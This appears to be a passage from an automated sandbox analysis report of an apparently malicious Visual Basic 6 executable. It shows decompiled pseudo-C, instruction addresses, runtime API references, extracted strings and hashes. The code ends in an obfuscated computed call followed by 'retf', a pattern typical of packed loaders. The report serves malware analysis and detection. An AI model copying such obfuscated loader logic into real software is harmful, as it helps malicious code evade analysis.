					_push(0x60);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v292 = _t518;
				}
				_v104 = 0x585fb5;
				_v112 = 3;
				 *_t772 =  *0x401130;
				_t523 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x16a30920, 0x5af9,  &_v112, _v172, _t708, _t708,  &_v176);
				_v220 = _t523;
				if(_v220 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x409cac);
					_push(_a4);
					_push(_v220);
					L004012B0();
					_v296 = _t523;
				}
				_v52 = _v176;
				L0040129E();
				L00401298();
				_v8 = 5;
				if( *0x410010 != 0) {
					_v300 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v300 = 0x410010;
				}
				_t527 =  &_v80;
				L004012AA();
				_v212 = _t527;
				_t531 =  *((intOrPtr*)( *_v212 + 0x178))(_v212,  &_v84, _t527,  *((intOrPtr*)( *((intOrPtr*)( *_v300)) + 0x308))( *_v300));
				asm("fclex");
				_v216 = _t531;
				if(_v216 >= 0) {
					_v304 = _v304 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v304 = _t531;
				}
				_push(0);
				_push(0);
				_push(_v84);
				_push( &_v112);
				L00401292();
				_t773 = _t772 + 0x10;
				if( *0x410010 != 0) {
					_v308 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v308 = 0x410010;
				}
				_t536 =  &_v88;
				L004012AA();
				_v220 = _t536;
				_t540 =  *((intOrPtr*)( *_v220 + 0x88))(_v220,  &_v172, _t536,  *((intOrPtr*)( *((intOrPtr*)( *_v308)) + 0x308))( *_v308));
				asm("fclex");
				_v224 = _t540;
				if(_v224 >= 0) {
					_v312 = _v312 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x409f4c);
					_push(_v220);
					_push(_v224);
					L004012B0();
					_v312 = _t540;
				}
				if( *0x410010 != 0) {
					_v316 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v316 = 0x410010;
				}
				_t544 =  &_v92;
				L004012AA();
				_v228 = _t544;
				_t548 =  *((intOrPtr*)( *_v228 + 0x1a0))(_v228,  &_v176, _t544,  *((intOrPtr*)( *((intOrPtr*)( *_v316)) + 0x308))( *_v316));
				asm("fclex");
				_v232 = _t548;
				if(_v232 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x409f4c);
					_push(_v228);
					_push(_v232);
					L004012B0();
					_v320 = _t548;
				}
				if( *0x410010 != 0) {
					_v324 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v324 = 0x410010;
				}
				_t722 =  *((intOrPtr*)( *_v324));
				_t552 =  &_v96;
				L004012AA();
				_v236 = _t552;
				_t556 =  *((intOrPtr*)( *_v236 + 0x60))(_v236,  &_v180, _t552,  *((intOrPtr*)(_t722 + 0x308))( *_v324));
				asm("fclex");
				_v240 = _t556;
				if(_v240 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x409f4c);
					_push(_v236);
					_push(_v240);
					L004012B0();
					_v328 = _t556;
				}
				_v152 = _v180;
				_v160 = 3;
				_v192 = _v176;
				_v188 = 0x1ec9a0;
				_v184 = 0x6e456d;
				_v120 = 0x5fabac;
				_v128 = 3;
				_v244 =  *0x401128;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t773 = _v172;
				_t182 =  &_v184; // 0x6e456d
				_t565 =  &_v112;
				L0040128C();
				_t568 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _t565, _t565, 0x85fed560, 0x5b03,  &_v128, _t182,  &_v188, _t722,  &_v192, 0x10, _t722, _t722,  &_v164);
				_v244 = _t568;
				if(_v244 >= 0) {
					_v332 = _v332 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x409cac);
					_push(_a4);
					_push(_v244);
					L004012B0();
					_v332 = _t568;
				}
				_v56 = _v164;
				_push( &_v84);
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push( &_v80);
				_push(5);
				L00401286();
				_push( &_v128);
				_push( &_v112);
				_push(2);
				L00401280();
				_v8 = 6;
				if( *0x410010 != 0) {
					_v336 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v336 = 0x410010;
				}
				_t580 =  &_v80;
				L004012AA();
				_v212 = _t580;
				_t584 =  *((intOrPtr*)( *_v212 + 0x60))(_v212,  &_v172, _t580,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x308))( *_v336));
				asm("fclex");
				_v216 = _t584;
				if(_v216 >= 0) {
					_v340 = _v340 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v340 = _t584;
				}
				_v136 = L"P199";
				_v144 = 8;
				_v176 = _v172;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v176, 0x10);
				L0040129E();
				_v8 = 7;
				if( *0x410010 != 0) {
					_v344 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v344 = 0x410010;
				}
				_t594 =  &_v80;
				L004012AA();
				_v212 = _t594;
				_t598 =  *((intOrPtr*)( *_v212 + 0x1a0))(_v212,  &_v172, _t594,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x308))( *_v344));
				asm("fclex");
				_v216 = _t598;
				if(_v216 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v348 = _t598;
				}
				if( *0x410010 != 0) {
					_v352 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v352 = 0x410010;
				}
				_t602 =  &_v84;
				L004012AA();
				_v220 = _t602;
				_t606 =  *((intOrPtr*)( *_v220 + 0x70))(_v220,  &_v176, _t602,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x308))( *_v352));
				asm("fclex");
				_v224 = _t606;
				if(_v224 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x409f4c);
					_push(_v220);
					_push(_v224);
					L004012B0();
					_v356 = _t606;
				}
				if( *0x410010 != 0) {
					_v360 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v360 = 0x410010;
				}
				_t610 =  &_v88;
				L004012AA();
				_v228 = _t610;
				_t614 =  *((intOrPtr*)( *_v228 + 0x48))(_v228,  &_v68, _t610,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x308))( *_v360));
				asm("fclex");
				_v232 = _t614;
				if(_v232 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x409f4c);
					_push(_v228);
					_push(_v232);
					L004012B0();
					_v364 = _t614;
				}
				if( *0x410010 != 0) {
					_v368 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v368 = 0x410010;
				}
				_t618 =  &_v92;
				L004012AA();
				_v236 = _t618;
				_t622 =  *((intOrPtr*)( *_v236 + 0x170))(_v236,  &_v72, _t618,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x308))( *_v368));
				asm("fclex");
				_v240 = _t622;
				if(_v240 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x409f4c);
					_push(_v236);
					_push(_v240);
					L004012B0();
					_v372 = _t622;
				}
				_v180 = 0x615bc7;
				_v268 = _v72;
				_v72 = _v72 & 0x00000000;
				_v120 = _v268;
				_v128 = 8;
				L0040127A();
				_v272 = _v68;
				_v68 = _v68 & 0x00000000;
				_v104 = _v272;
				_v112 = 8;
				_v136 = _v172;
				_v144 = 3;
				_v164 = 0x3576;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v408 = _v176;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v164, 0x10,  &_v76, 0x10,  &_v76, 0x10,  &_v180,  &_v168);
				_v44 = _v168;
				L00401274();
				L00401286();
				L00401280();
				_v8 = 8;
				_v104 = 0x18301d;
				_v112 = 3;
				L0040127A();
				_t649 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v68,  &_v112, 2,  &_v112,  &_v128, 4,  &_v80,  &_v84,  &_v88,  &_v92);
				_v212 = _t649;
				if(_v212 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x409cac);
					_push(_a4);
					_push(_v212);
					L004012B0();
					_v376 = _t649;
				}
				L00401274();
				L00401298();
				_v8 = 9;
				if( *0x410010 != 0) {
					_v380 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v380 = 0x410010;
				}
				_t653 =  &_v80;
				L004012AA();
				_v212 = _t653;
				_t657 =  *((intOrPtr*)( *_v212 + 0x170))(_v212,  &_v68, _t653,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x308))( *_v380));
				asm("fclex");
				_v216 = _t657;
				if(_v216 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v384 = _t657;
				}
				if( *0x410010 != 0) {
					_v388 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v388 = 0x410010;
				}
				_t661 =  &_v84;
				L004012AA();
				_v220 = _t661;
				_t665 =  *((intOrPtr*)( *_v220 + 0x80))(_v220,  &_v172, _t661,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x308))( *_v388));
				asm("fclex");
				_v224 = _t665;
				if(_v224 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x409f4c);
					_push(_v220);
					_push(_v224);
					L004012B0();
					_v392 = _t665;
				}
				if( *0x410010 != 0) {
					_v396 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v396 = 0x410010;
				}
				_t669 =  &_v88;
				L004012AA();
				_v228 = _t669;
				_t673 =  *((intOrPtr*)( *_v228 + 0x48))(_v228,  &_v72, _t669,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x308))( *_v396));
				asm("fclex");
				_v232 = _t673;
				if(_v232 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x409f4c);
					_push(_v228);
					_push(_v232);
					L004012B0();
					_v400 = _t673;
				}
				_v136 = 0x52704a;
				_v144 = 3;
				_v208 = 0xab6c2610;
				_v204 = 0x5afc;
				_v184 =  *0x401120;
				_v180 = _v172;
				_v200 =  *0x401118;
				_v176 = 0x1e0e2d;
				L004011C0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t683 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v176, _v68,  &_v200,  &_v180, _v72,  &_v184, 0x16b3bc,  &_v208, 0x10,  &_v188);
				_v236 = _t683;
				if(_v236 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x409cac);
					_push(_a4);
					_push(_v236);
					L004012B0();
					_v404 = _t683;
				}
				_v40 = _v188;
				L0040126E();
				L00401286();
				_v8 = 0xa;
				_t693 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v164, 3,  &_v80,  &_v84,  &_v88, 2,  &_v68,  &_v72);
				asm("fclex");
				_v212 = _t693;
				if(_v212 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x409c7c);
					_push(_a4);
					_push(_v212);
					L004012B0();
					_v408 = _t693;
				}
				_t699 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v216 = _t699;
				if(_v216 >= 0) {
					_v412 = _v412 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x409c7c);
					_push(_a4);
					_push(_v216);
					L004012B0();
					_v412 = _t699;
				}
				_v8 = 0xb;
				L00401268();
				_v8 = 0xc;
				_v22 = 0xffd5846e;
				_v22 = _v22 + 0x6a95b0;
				_t700 = _v22(0xffffffff);
				asm("retf 0x40");
				return _t700;
			}

0x0040ba67
0x0040ba76
0x0040ba82
0x0040ba8a
0x0040ba8d
0x0040ba9a
0x0040baa3
0x0040baa6
0x0040bab5
0x0040bab8
0x0040babf
0x0040bad5
0x0040bad8
0x0040bada
0x0040bae7
0x0040bb06
0x0040bae9
0x0040bae9
0x0040baeb
0x0040baf0
0x0040baf3
0x0040baf9
0x0040bafe
0x0040bafe
0x0040bb13
0x0040bb18
0x0040bb1b
0x0040bb29
0x0040bb46
0x0040bb2b
0x0040bb2b
0x0040bb30
0x0040bb35
0x0040bb3a
0x0040bb3a
0x0040bb60
0x0040bb6a
0x0040bb6e
0x0040bb73
0x0040bb8e
0x0040bb94
0x0040bb96
0x0040bba3
0x0040bbc8
0x0040bba5
0x0040bba5
0x0040bbaa
0x0040bbaf
0x0040bbb5
0x0040bbbb
0x0040bbc0
0x0040bbc0
0x0040bbd6
0x0040bbf3
0x0040bbfe
0x0040bc0a
0x0040bc10
0x0040bc15
0x0040bc23
0x0040bc40
0x0040bc25
0x0040bc25
0x0040bc2a
0x0040bc2f
0x0040bc34
0x0040bc34
0x0040bc5a
0x0040bc64
0x0040bc68
0x0040bc6d
0x0040bc88
0x0040bc8b
0x0040bc8d
0x0040bc9a
0x0040bcbc
0x0040bc9c
0x0040bc9c
0x0040bc9e
0x0040bca3
0x0040bca9
0x0040bcaf
0x0040bcb4
0x0040bcb4
0x0040bcc3
0x0040bcca
0x0040bce0
0x0040bcff
0x0040bd05
0x0040bd12
0x0040bd34
0x0040bd14
0x0040bd14
0x0040bd19
0x0040bd1e
0x0040bd21
0x0040bd27
0x0040bd2c
0x0040bd2c
0x0040bd41
0x0040bd47
0x0040bd4f
0x0040bd54
0x0040bd62
0x0040bd7f
0x0040bd64
0x0040bd64
0x0040bd69
0x0040bd6e
0x0040bd73
0x0040bd73
0x0040bda3
0x0040bda7
0x0040bdac
0x0040bdc4
0x0040bdca
0x0040bdcc
0x0040bdd9
0x0040bdfe
0x0040bddb
0x0040bddb
0x0040bde0
0x0040bde5
0x0040bdeb
0x0040bdf1
0x0040bdf6
0x0040bdf6
0x0040be05
0x0040be07
0x0040be09
0x0040be0f
0x0040be10
0x0040be15
0x0040be1f
0x0040be3c
0x0040be21
0x0040be21
0x0040be26
0x0040be2b
0x0040be30
0x0040be30
0x0040be60
0x0040be64
0x0040be69
0x0040be84
0x0040be8a
0x0040be8c
0x0040be99
0x0040bebe
0x0040be9b
0x0040be9b
0x0040bea0
0x0040bea5
0x0040beab
0x0040beb1
0x0040beb6
0x0040beb6
0x0040becc
0x0040bee9
0x0040bece
0x0040bece
0x0040bed3
0x0040bed8
0x0040bedd
0x0040bedd
0x0040bf0d
0x0040bf11
0x0040bf16
0x0040bf31
0x0040bf37
0x0040bf39
0x0040bf46
0x0040bf6b
0x0040bf48
0x0040bf48
0x0040bf4d
0x0040bf52
0x0040bf58
0x0040bf5e
0x0040bf63
0x0040bf63
0x0040bf79
0x0040bf96
0x0040bf7b
0x0040bf7b
0x0040bf80
0x0040bf85
0x0040bf8a
0x0040bf8a
0x0040bfb0
0x0040bfba
0x0040bfbe
0x0040bfc3
0x0040bfde
0x0040bfe1
0x0040bfe3
0x0040bff0
0x0040c012
0x0040bff2
0x0040bff2
0x0040bff4
0x0040bff9
0x0040bfff
0x0040c005
0x0040c00a
0x0040c00a
0x0040c01f
0x0040c025
0x0040c035
0x0040c03b
0x0040c045
0x0040c04f
0x0040c056
0x0040c06c
0x0040c072
0x0040c07f
0x0040c080
0x0040c081
0x0040c082
0x0040c091
0x0040c09b
0x0040c0b0
0x0040c0b4
0x0040c0c2
0x0040c0c8
0x0040c0d5
0x0040c0f7
0x0040c0d7
0x0040c0d7
0x0040c0dc
0x0040c0e1
0x0040c0e4
0x0040c0ea
0x0040c0ef
0x0040c0ef
0x0040c105
0x0040c10c
0x0040c110
0x0040c114
0x0040c118
0x0040c11c
0x0040c11d
0x0040c11f
0x0040c12a
0x0040c12e
0x0040c12f
0x0040c131
0x0040c139
0x0040c147
0x0040c164
0x0040c149
0x0040c149
0x0040c14e
0x0040c153
0x0040c158
0x0040c158
0x0040c188
0x0040c18c
0x0040c191
0x0040c1ac
0x0040c1af
0x0040c1b1
0x0040c1be
0x0040c1e0
0x0040c1c0
0x0040c1c0
0x0040c1c2
0x0040c1c7
0x0040c1cd
0x0040c1d3
0x0040c1d8
0x0040c1d8
0x0040c1e7
0x0040c1f1
0x0040c201
0x0040c20a
0x0040c217
0x0040c218
0x0040c219
0x0040c21a
0x0040c22a
0x0040c233
0x0040c238
0x0040c246
0x0040c263
0x0040c248
0x0040c248
0x0040c24d
0x0040c252
0x0040c257
0x0040c257
0x0040c287
0x0040c28b
0x0040c290
0x0040c2ab
0x0040c2b1
0x0040c2b3
0x0040c2c0
0x0040c2e5
0x0040c2c2
0x0040c2c2
0x0040c2c7
0x0040c2cc
0x0040c2d2
0x0040c2d8
0x0040c2dd
0x0040c2dd
0x0040c2f3
0x0040c310
0x0040c2f5
0x0040c2f5
0x0040c2fa
0x0040c2ff
0x0040c304
0x0040c304
0x0040c334
0x0040c338
0x0040c33d
0x0040c358
0x0040c35b
0x0040c35d
0x0040c36a
0x0040c38c
0x0040c36c
0x0040c36c
0x0040c36e
0x0040c373
0x0040c379
0x0040c37f
0x0040c384
0x0040c384
0x0040c39a
0x0040c3b7
0x0040c39c
0x0040c39c
0x0040c3a1
0x0040c3a6
0x0040c3ab
0x0040c3ab
0x0040c3db
0x0040c3df
0x0040c3e4
0x0040c3fc
0x0040c3ff
0x0040c401
0x0040c40e
0x0040c430
0x0040c410
0x0040c410
0x0040c412
0x0040c417
0x0040c41d
0x0040c423
0x0040c428
0x0040c428
0x0040c43e
0x0040c45b
0x0040c440
0x0040c440
0x0040c445
0x0040c44a
0x0040c44f
0x0040c44f
0x0040c47f
0x0040c483
0x0040c488
0x0040c4a0
0x0040c4a6
0x0040c4a8
0x0040c4b5
0x0040c4da
0x0040c4b7
0x0040c4b7
0x0040c4bc
0x0040c4c1
0x0040c4c7
0x0040c4cd
0x0040c4d2
0x0040c4d2
0x0040c4e1
0x0040c4ee
0x0040c4f4
0x0040c4fe
0x0040c501
0x0040c510
0x0040c518
0x0040c51e
0x0040c528
0x0040c52b
0x0040c538
0x0040c53e
0x0040c548
0x0040c562
0x0040c56c
0x0040c56d
0x0040c56e
0x0040c56f
0x0040c577
0x0040c581
0x0040c582
0x0040c583
0x0040c584
0x0040c58c
0x0040c592
0x0040c59f
0x0040c5a0
0x0040c5a1
0x0040c5a2
0x0040c5b2
0x0040c5bf
0x0040c5c6
0x0040c5dd
0x0040c5ef
0x0040c5f7
0x0040c5fe
0x0040c605
0x0040c614
0x0040c629
0x0040c62f
0x0040c63c
0x0040c65e
0x0040c63e
0x0040c63e
0x0040c643
0x0040c648
0x0040c64b
0x0040c651
0x0040c656
0x0040c656
0x0040c668
0x0040c670
0x0040c675
0x0040c683
0x0040c6a0
0x0040c685
0x0040c685
0x0040c68a
0x0040c68f
0x0040c694
0x0040c694
0x0040c6c4
0x0040c6c8
0x0040c6cd
0x0040c6e5
0x0040c6eb
0x0040c6ed
0x0040c6fa
0x0040c71f
0x0040c6fc
0x0040c6fc
0x0040c701
0x0040c706
0x0040c70c
0x0040c712
0x0040c717
0x0040c717
0x0040c72d
0x0040c74a
0x0040c72f
0x0040c72f
0x0040c734
0x0040c739
0x0040c73e
0x0040c73e
0x0040c76e
0x0040c772
0x0040c777
0x0040c792
0x0040c798
0x0040c79a
0x0040c7a7
0x0040c7cc
0x0040c7a9
0x0040c7a9
0x0040c7ae
0x0040c7b3
0x0040c7b9
0x0040c7bf
0x0040c7c4
0x0040c7c4
0x0040c7da
0x0040c7f7
0x0040c7dc
0x0040c7dc
0x0040c7e1
0x0040c7e6
0x0040c7eb
0x0040c7eb
0x0040c81b
0x0040c81f
0x0040c824
0x0040c83c
0x0040c83f
0x0040c841
0x0040c84e
0x0040c870
0x0040c850
0x0040c850
0x0040c852
0x0040c857
0x0040c85d
0x0040c863
0x0040c868
0x0040c868
0x0040c877
0x0040c881
0x0040c88b
0x0040c895
0x0040c8a5
0x0040c8b1
0x0040c8bd
0x0040c8c3
0x0040c8d7
0x0040c8e4
0x0040c8e5
0x0040c8e6
0x0040c8e7
0x0040c91e
0x0040c924
0x0040c931
0x0040c953
0x0040c933
0x0040c933
0x0040c938
0x0040c93d
0x0040c940
0x0040c946
0x0040c94b
0x0040c94b
0x0040c960
0x0040c96d
0x0040c983
0x0040c98b
0x0040c9a1
0x0040c9a7
0x0040c9a9
0x0040c9b6
0x0040c9d8
0x0040c9b8
0x0040c9b8
0x0040c9bd
0x0040c9c2
0x0040c9c5
0x0040c9cb
0x0040c9d0
0x0040c9d0
0x0040c9f4
0x0040c9fa
0x0040c9fc
0x0040ca09
0x0040ca2b
0x0040ca0b
0x0040ca0b
0x0040ca10
0x0040ca15
0x0040ca18
0x0040ca1e
0x0040ca23
0x0040ca23
0x0040ca32
0x0040ca3b
0x0040ca40
0x0040ca47
0x0040ca4e
0x0040ca55
0x0040ca58
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 0040BA82
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409C7C,00000070), ref: 0040BAF9
__vbaFpI4.MSVBVM60(00000000,?,00409C7C,00000070), ref: 0040BB13
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040BB35
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040BB6E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409F4C,00000190), ref: 0040BBBB
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 0040BC10
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?), ref: 0040BC2F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?), ref: 0040BC68
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409F4C,00000060,?,?,?,?), ref: 0040BCAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409CAC,000006F8,?,?,?,?,?,?,?), ref: 0040BD27
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?), ref: 0040BD47
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?), ref: 0040BD4F
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,?,?,?), ref: 0040BD6E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 0040BDA7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409F4C,00000178,?,?,?,?,?,?,?), ref: 0040BDF1
__vbaLateIdCallLd.MSVBVM60(00000003,?,00000000,00000000,?,?,?,?,?,?,?), ref: 0040BE10
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,004011C6), ref: 0040BE2B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040BE64
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000088), ref: 0040BEB1
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040BED8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF11
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001A0), ref: 0040BF5E
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040BF85
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040BFBE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000060), ref: 0040C005
__vbaChkstk.MSVBVM60(?,?,?), ref: 0040C072
__vbaI4Var.MSVBVM60(?,85FED560,00005B03,00000003,mEn,001EC9A0,?,?,?,?,?), ref: 0040C0B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409CAC,000006FC,?,?,?,?,?), ref: 0040C0EA
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040C11F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0040C131
__vbaNew2.MSVBVM60(0040A114,00410010,?,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0040C153
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C18C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000060), ref: 0040C1D3
__vbaChkstk.MSVBVM60(00000000,?,00409F4C,00000060), ref: 0040C20A
__vbaFreeObj.MSVBVM60 ref: 0040C233
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C252
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C28B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,000001A0), ref: 0040C2D8
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C2FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C338
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000070), ref: 0040C37F
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C3A6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000048), ref: 0040C423
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C44A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C483
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000170), ref: 0040C4CD
__vbaStrCopy.MSVBVM60(00000000,?,00409F4C,00000170), ref: 0040C510
__vbaChkstk.MSVBVM60(00615BC7,?), ref: 0040C562
__vbaChkstk.MSVBVM60(?,00615BC7,?), ref: 0040C577
__vbaChkstk.MSVBVM60(?,?,00615BC7,?), ref: 0040C592
__vbaFreeStr.MSVBVM60(?,?,00615BC7,?), ref: 0040C5C6
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,00615BC7,?), ref: 0040C5DD
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040C5EF
__vbaStrCopy.MSVBVM60 ref: 0040C614
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409CAC,00000700), ref: 0040C651
__vbaFreeStr.MSVBVM60(00000000,?,00409CAC,00000700), ref: 0040C668
__vbaFreeVar.MSVBVM60(00000000,?,00409CAC,00000700), ref: 0040C670
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C68F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C6C8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409F4C,00000170), ref: 0040C712
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C739
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C772
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000080), ref: 0040C7BF
__vbaNew2.MSVBVM60(0040A114,00410010), ref: 0040C7E6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C81F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409F4C,00000048), ref: 0040C863
__vbaChkstk.MSVBVM60(?), ref: 0040C8D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409CAC,00000704), ref: 0040C946
__vbaFreeStrList.MSVBVM60(00000002,00000000,00000000), ref: 0040C96D
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040C983
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409C7C,000001B8), ref: 0040C9CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409C7C,000001BC), ref: 0040CA1E
__vbaOnError.MSVBVM60(000000FF), ref: 0040CA3B

Strings

cB2b852boG140, xrefs: 0040C60C
v5, xrefs: 0040C548
mEn, xrefs: 0040C09B, 0040C0A1
P199, xrefs: 0040C1E7
z3CAFKUN189, xrefs: 0040C508
JpR, xrefs: 0040C877

Memory Dump Source

Source File: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free$Chkstk$List$Copy$CallErrorLate
String ID: JpR$P199$cB2b852boG140$mEn$v5$z3CAFKUN189
API String ID: 3712285692-727928163
Opcode ID: 091029c09dc020d61b1bccb761e9d90042d6dc5870f70be23f53874c4a724b89
Instruction ID: 3df13b803ff4ee913e20e276d847f6220ee7e8f89c3119d3245da10cedf3dfad
Opcode Fuzzy Hash: 091029c09dc020d61b1bccb761e9d90042d6dc5870f70be23f53874c4a724b89
Instruction Fuzzy Hash: A8A2D571900218DFDB21DF90CC49BD9BBB4BF08304F1045EAE549BB2A1CBB95A85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 021F0613, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

